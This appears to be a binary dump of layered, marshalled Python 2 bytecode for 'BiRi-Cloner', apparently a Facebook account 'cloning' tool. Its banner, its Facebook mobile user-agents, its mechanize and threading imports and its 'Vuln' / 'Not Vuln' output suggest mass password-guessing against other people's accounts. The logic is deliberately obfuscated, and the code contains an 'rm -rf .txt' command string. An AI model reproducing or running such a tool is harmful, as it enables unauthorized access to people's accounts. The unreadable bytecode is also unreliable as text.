\x02\x00l\x03\x00Z\x03\x00e\x03\x00j\x04\x00d\x03\x00\x83\x01\x00d\x02\x00\x04Ud\x02\x00S(\x04\x00\x00\x00i\x00\x00\x00\x00i\xff\xff\xff\xffNs~G\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00sD\x00\x00\x00e\x00\x00Z\x01\x00e\x01\x00r#\x00d\x00\x00d\x00\x00\x15Z\x02\x00\x84\x15\x00\x84\x01\x00\x15Z\x02\x00n\x00\x00d\x01\x00d\x02\x00l\x03\x00Z\x03\x00e\x03\x00j\x04\x00d\x03\x00\x83\x01\x00d\x02\x00\x04Ud\x02\x00S(\x04\x00\x00\x00i\x00\x00\x00\x00i\xff\xff\xff\xffNs\xa0F\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00sD\x00\x00\x00e\x00\x00Z\x01\x00e\x01\x00r#\x00d\x00\x00d\x00\x00\x15Z\x02\x00\x84\x15\x00\x84\x01\x00\x15Z\x02\x00n\x00\x00d\x01\x00d\x02\x00l\x03\x00Z\x03\x00e\x03\x00j\x04\x00d\x03\x00\x83\x01\x00d\x02\x00\x04Ud\x02\x00S(\x04\x00\x00\x00i\x00\x00\x00\x00i\xff\xff\xff\xffNs\xc2E\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00sD\x00\x00\x00e\x00\x00Z\x01\x00e\x01\x00r#\x00d\x00\x00d\x00\x00\x15Z\x02\x00\x84\x15\x00\x84\x01\x00\x15Z\x02\x00n\x00\x00d\x01\x00d\x02\x00l\x03\x00Z\x03\x00e\x03\x00j\x04\x00d\x03\x00\x83\x01\x00d\x02\x00\x04Ud\x02\x00S(\x04\x00\x00\x00i\x00\x00\x00\x00i\xff\xff\xff\xffNs\xe4D\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00s\x88\x03\x00\x00e\x00\x00Z\x01\x00e\x01\x00r#\x00d\x00\x00d\x00\x00\x15Z\x02\x00\x84\x15\x00\x84\x01\x00\x15Z\x02\x00n\x00\x00d\x01\x00d\x02\x00l\x03\x00Z\x03\x00d\x01\x00d\x02\x00l\x04\x00Z\x04\x00d\x01\x00d\x02\x00l\x05\x00Z\x05\x00d\x01\x00d\x02\x00l\x06\x00Z\x06\x00d\x01\x00d\x02\x00l\x07\x00Z\x07\x00d\x01\x00d\x02\x00l\x08\x00Z\x08\x00d\x01\x00d\x02\x00l\t\x00Z\t\x00d\x01\x00d\x02\x00l\n\x00Z\n\x00d\x01\x00d\x02\x00l\x0b\x00Z\x0b\x00d\x01\x00d\x02\x00l\x0c\x00Z\x0c\x00d\x01\x00d\x02\x00l\r\x00Z\r\x00d\x01\x00d\x02\x00l\x0e\x00Z\x0e\x00e\x03\x00j\x0f\x00d\x03\x00\x83\x01\x00\x01xJ\x00e\x10\x00d\x04\x00\x83\x01\x00D]<\x00Z\x11\x00e\x07\x00j\x12\x00d\x05\x00d\x06\x00\x83\x02\x00Z\x13\x00e\x14\x00d\x07\x00d\x08\x00\x83\x02\x00e\x04\x00_\x15\x00e\x13\x00GHe\x04\x00j\x15\x00j\x16\x00\x83\x00\x00\x01q\xcd\x00Wy\x10\x00d\x01\x00d\x02\x00l\x17\x00Z\x17\x00Wn\x1e\x00\x04e\x18\x00k\n\x00r=\x01\x01\x01\x01e\x03\x00j\x0f\x00d\t\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x01\x00d\x02\x00l\x19\x00Z\x19\x00Wn8\x00\x04e\x18\x00k\n\x00r\x88\x01\x01\x01\x01e\x03\x00j\x0f\x00d\n\x00\x83\x01\x00\x01e\x05\x00j\x1a\x00d\x0b\x00\x83\x01\x00\x01e\x03\x00j\x0f\x00d\x0c\x00\x83\x01\x00\x01n\x01\x00Xd\x01\x00d\x02\x00l\x03\x00Z\x03\x00d\x01\x00d\x02\x00l\x04\x00Z\x04\x00d\x01\x00d\x02\x00l\x05\x00Z\x05\x00d\x01\x00d\x02\x00l\x06\x00Z\x06\x00d\x01\x00d\x02\x00l\x07\x00Z\x07\x00d\x01\x00d\x02\x00l\x08\x00Z\x08\x00d\x01\x00d\x02\x00l\t\x00Z\t\x00d\x01\x00d\x02\x00l\n\x00Z\n\x00d\x01\x00d\x02\x00l\x0b\x00Z\x0b\x00d\x01\x00d\x02\x00l\x0c\x00Z\x0c\x00d\x01\x00d\x02\x00l\r\x00Z\r\x00d\x01\x00d\x02\x00l\x17\x00Z\x17\x00d\x01\x00d\x02\x00l\x19\x00Z\x19\x00d\x01\x00d\r\x00l\x1b\x00m\x1c\x00Z\x1c\x00\x01d\x01\x00d\x0e\x00l\x1d\x00m\x1e\x00Z\x1e\x00\x01d\x01\x00d\x0f\x00l\x19\x00m\x1f\x00Z\x1f\x00\x01e \x00e\x04\x00\x83\x01\x00\x01e\x04\x00j!\x00d\x10\x00\x83\x01\x00\x01e\x19\x00j\x1f\x00\x83\x00\x00Z"\x00e"\x00j#\x00e\x00\x00\x83\x01\x00\x01e"\x00j$\x00e\x19\x00j%\x00j&\x00\x83\x00\x00d\x11\x00d\x0b\x00\x83\x01\x01\x01d)\x00g\x01\x00e"\x00_\'\x00d*\x00g\x01\x00e"\x00_\'\x00d\x16\x00\x84\x00\x00Z(\x00d\x17\x00\x84\x00\x00Z)\x00d\x18\x00\x84\x00\x00Z*\x00d\x19\x00\x84\x00\x00Z+\x00d\x1a\x00\x84\x00\x00Z,\x00d\x1b\x00\x84\x00\x00Z-\x00d\x1c\x00\x84\x00\x00Z.\x00d\x00\x00Z/\x00g\x00\x00a0\x00g\x00\x00Z1\x00g\x00\x00a2\x00d\x1d\x00Z3\x00d\x1e\x00Z4\x00e\x03\x00j\x0f\x00d\x1f\x00\x83\x01\x00\x01d \x00Z5\x00d!\x00Z6\x00d"\x00Z7\x00d"\x00Z8\x00d#\x00\x84\x00\x00Z9\x00d$\x00\x84\x00\x00Z:\x00d%\x00\x84\x00\x00Z;\x00d&\x00\x84\x00\x00Z<\x00d\'\x00\x84\x00\x00Z=\x00e>\x00d(\x00k\x02\x00r\x84\x03e9\x00\x83\x00\x00\x01n\x00\x00d\x02\x00S(+\x00\x00\x00i\x00\x00\x00\x00i\xff\xff\xff\xffNs\x0b\x00\x00\x00rm -rf .txti\x10\'\x00\x00iG\xf4\x10\x00i\x7f\x96\x98\x00s\x04\x00\x00\x00.txtt\x01\x00\x00\x00as4\x00\x00\x00No Module Named Requests! type:pip2 install requestss6\x00\x00\x00No Module Named Mechanize! type:pip2 install mechanizei\x01\x00\x00\x00s\x1f\x00\x00\x00Then type: python2 biriclone.py(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_times\n\x00\x00\x00User-Agentsx\x00\x00\x00Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36s\n\x00\x00\x00user-agents\x1d\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/64.64.121.87;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/redmi;FBBD/redmi;FBPN/com.facebook.katana;FBDV/Redmi 6A;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x07\x00\x00\x00Thanks.(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x06\x00\x00\x00keluar-\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x04\x00\x00\x00acak1\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x01c\x01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\n\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x07\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x15\x00\x00\x00t\x01\x00\x00\x00jR\r\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>R\x11\x00\x00\x009\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x01\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\xb8\x1e\x85\xebQ\xb8\x9e?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x05\x00\x00\x00jalanC\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s\x1b\x00\x00\x00\r\x1b[1;93mPlease Wait \x1b[1;93mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x03\x00\x00\x00tikI\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng333333\xd3?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x02\x00\x00\x00cpN\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\x9a\x99\x99\x99\x99\x99\xa9?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<THBD>t\x03\x00\x00\x00psbT\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\x05\x00\x00\x00clears\xcb\n\x00\x00\n\x1b[1;91m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;95m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;91m \xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\n \xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac\xf0\x9f\x92\x93\xf0\x9f\x9a\xac \n\x1b[1;97m \n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1;93m \xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x84\xe2\x94\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x94\x80\xe2\x96\x80\xe2\x94\x80\xe2\x96\x88\xe2\x96\x88 \n\x1b[1;91m \xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\xe2\x96\x84\xe2\x96\x84\xe2\x96\x80\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m\xe2\x9e\xa3 Modified By : \xf0\x9f\x92\x97 BiRi_B@B@ \xf0\x9f\x92\x97\n\x1b[1;91m\xe2\x9e\xa3 CYBER NAME : \xf0\x9f\x92\xa3BiRi-Cloner \xf0\x9f\x92\xa3\n\x1b[1;93m\xe2\x9e\xa3 WHATSAPP NO : \xf0\x9f\x91\xac prem korba? \xf0\x9f\x91\xac\n\x1b[1;95m\xe2\x9e\xa3 WARNING : \xf0\x9f\x9a\xac BiRi is injurious to health\xf0\x9f\x94\xab\n\x1b[1;96m\xe2\x9e\xa3 FUNNY LINE : \xf0\x9f\x99\x89Birier put** dis\xf0\x9f\xa4\xad\n\x1b[1;97m\xe2\x9e\xa3 NOTE : \xf0\x9f\x92\x95USE Mobile data for better success\xf0\x9f\x92\x95\n\x1b[1;92m\xe2\x9e\xa3 NOTE : \xf0\x9f\x91\x8fUSE FAST 4G SIM NET\xf0\x9f\x91\x8f\n\x1b[1;91m\xe2\x9e\xa3 NOTE : \xf0\x9f\x8c\x8d 1ST Bishmillah Boila nen\xf0\x9f\x8c\x8d\n\x1b[1;95m\xe2\x9e\xa3 ALL COUNTIRS: \xf0\x9f\x8c\xb7 Choose Your 3 Password \xf0\x9f\x8c\xb7 \n\x1b[1;93m\xe2\x9e\xa3 DISCLAMIAR : \xf0\x9f\x91\x8aDON,T USE ILLIGAL WAY\xf0\x9f\x91\x8a\n\x1b[1;93m--------------------------------------------------------------\n\x1b[1;92m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;92m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x92\x96\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\n\x1b[1;91m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\n\x1b[1;92m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;93m ALLWAYS BE HAPPY \x1b[1;92m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;93m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;96m STAY WITH THBD\x1b[1;93m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;94m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\x1b[1;95m PRAY FOR ME \x1b[1;94m\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a \n\x1b[1;95m\xe2\x96\x88\xe2\x9d\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x96\x87\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x9d\x9a\n\x1b[1;93m \xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\x1b[1;93m \xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91(\xc2\xaf`\xf0\x9f\x8c\xb7\xc2\xb4\xc2\xaf)\xe2\x96\x91\xe2\x96\x91\n sR\n\x00\x00\n\x1b[1;91m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;92m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\xa6\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;95m \xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\n\x1b[1;91m\n \xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac \xf0\x9f\x92\x93\xf0\x9f\x9a\xac\xf0\x9f\x92\x93\xf0\x9f\x9a\xac\n\x1b[1;93m \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\n\x1b[1;93m 